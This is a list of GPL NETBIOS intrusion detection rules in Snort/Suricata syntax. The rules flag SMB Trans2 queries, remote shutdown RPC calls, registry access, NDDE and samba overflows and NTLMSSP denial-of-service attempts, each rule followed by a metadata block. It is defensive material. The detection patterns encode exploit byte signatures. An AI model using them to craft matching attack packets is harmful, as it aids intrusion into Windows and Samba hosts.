Type : SID

Performance Impact : Not defined

2103136

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Trans2 QUERY_FILE_INFO andx attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; content:"2"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|07 00|"; within:2; distance:29; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103136; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Trans2 QUERY_FILE_INFO andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103137

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Trans2 QUERY_FILE_INFO attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB2"; within:5; distance:3; content:"|07 00|"; within:2; distance:56; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103137; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Trans2 QUERY_FILE_INFO attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103138

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Trans2 QUERY_FILE_INFO andx attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; content:"2"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|07 00|"; within:2; distance:29; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103138; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Trans2 QUERY_FILE_INFO andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103139

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Trans2 FIND_FIRST2 attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB2"; within:5; distance:3; content:"|01 00|"; within:2; distance:56; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103139; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Trans2 FIND_FIRST2 attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103140

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Trans2 FIND_FIRST2 andx attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; content:"2"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:29; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103140; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Trans2 FIND_FIRST2 andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103141

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS Trans2 FIND_FIRST2 attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB2"; within:5; distance:3; content:"|01 00|"; within:2; distance:56; flowbits:set,smb.trans2; flowbits:noalert; classtype:protocol-command-decode; sid:2103141; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS Trans2 FIND_FIRST2 attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100292

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS x86 Linux samba overflow"; flow:to_server,established; content:"|EB|/_|EB|J^|89 FB 89|>|89 F2|"; reference:bugtraq,1816; reference:bugtraq,536; reference:cve,1999-0182; reference:cve,1999-0811; classtype:attempted-admin; sid:2100292; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : x86 Linux samba overflow

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1816|bugtraq,536|cve,1999-0182|cve,1999-0811

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100686

alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 1433 (msg:"GPL NETBIOS xp_reg* - registry access"; flow:to_server,established; content:"x|00|p|00|_|00|r|00|e|00|g|00|"; nocase; reference:bugtraq,5205; reference:cve,2002-0642; reference:nessus,10642; reference:url,www.microsoft.com/technet/security/bulletin/MS02-034; classtype:attempted-user; sid:2100686; rev:11; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : xp_reg* - registry access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-user

URL reference : bugtraq,5205|cve,2002-0642|nessus,10642|url,www.microsoft.com/technet/security/bulletin/MS02-034

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 11

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2100689

alert tcp $EXTERNAL_NET any -> $SQL_SERVERS 139 (msg:"GPL NETBIOS xp_reg* registry access"; flow:to_server,established; content:"x|00|p|00|_|00|r|00|e|00|g|00|"; depth:32; offset:32; nocase; reference:bugtraq,5205; reference:cve,2002-0642; reference:nessus,10642; reference:url,www.microsoft.com/technet/security/bulletin/MS02-034; classtype:attempted-user; sid:2100689; rev:12; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : xp_reg* registry access

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-user

URL reference : bugtraq,5205|cve,2002-0642|nessus,10642|url,www.microsoft.com/technet/security/bulletin/MS02-034

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 12

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103183

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB CoGetInstanceFromFile unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.msqueue; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|01 00|"; within:2; distance:19; byte_test:4,>,256,20,relative; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:attempted-admin; sid:2103183; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB CoGetInstanceFromFile unicode little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103021

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode andx oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; isdataat:4,relative; byte_test:4,>,1024,40,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103021; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode andx oversized Security Descriptor attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102999

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; within:1; distance:4; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102999; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown unicode little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102998

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown unicode andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102998; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown unicode andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102997

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102997; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102996

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS InitiateSystemShutdown andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102996; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS InitiateSystemShutdown andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102995

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102995; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown unicode little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102994

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown unicode andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102994; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown unicode andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102993

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|18 00|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102993; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102992

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB InitiateSystemShutdown andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 18|"; within:2; distance:19; classtype:protocol-command-decode; sid:2102992; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB InitiateSystemShutdown andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102991

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode andx bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; classtype:protocol-command-decode; sid:2102991; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102964

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102964; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102965

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102965; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102966

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102966; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW unicode andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102967

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; pcre:"/^.{4}/R"; content:"|05|"; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102967; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW unicode little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102384

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NTLMSSP invalid mechlistMIC attempt"; flow:to_server,established; content:"|FF|SMBs"; depth:5; offset:4; nocase; content:"`"; depth:1; offset:63; content:"|00 00 00|b|06 83 00 00 06|+|06 01 05 05 02|"; within:15; distance:1; content:"|06 0A|+|06 01 04 01 82|7|02 02 0A|"; distance:0; content:"|A3|>0<|A0|0"; distance:0; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12054; reference:nessus,12065; classtype:attempted-dos; sid:2102384; rev:11; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NTLMSSP invalid mechlistMIC attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-dos

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12054|nessus,12065

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 11

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102401

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Session Setup AndX request username overflow attempt"; flow:to_server,established; content:"|00|"; depth:1; byte_test:2,>,322,2; content:"|FF|SMBs"; depth:5; offset:4; nocase; byte_test:1,<,128,6,relative; content:"|00 00 00 00|"; within:4; distance:42; byte_test:2,>,255,8,relative,little; content:!"|00|"; within:255; distance:10; reference:bugtraq,9752; reference:url,www.eeye.com/html/Research/Advisories/AD20040226.html; classtype:attempted-admin; sid:2102401; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Session Setup AndX request username overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,9752|url,www.eeye.com/html/Research/Advisories/AD20040226.html

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

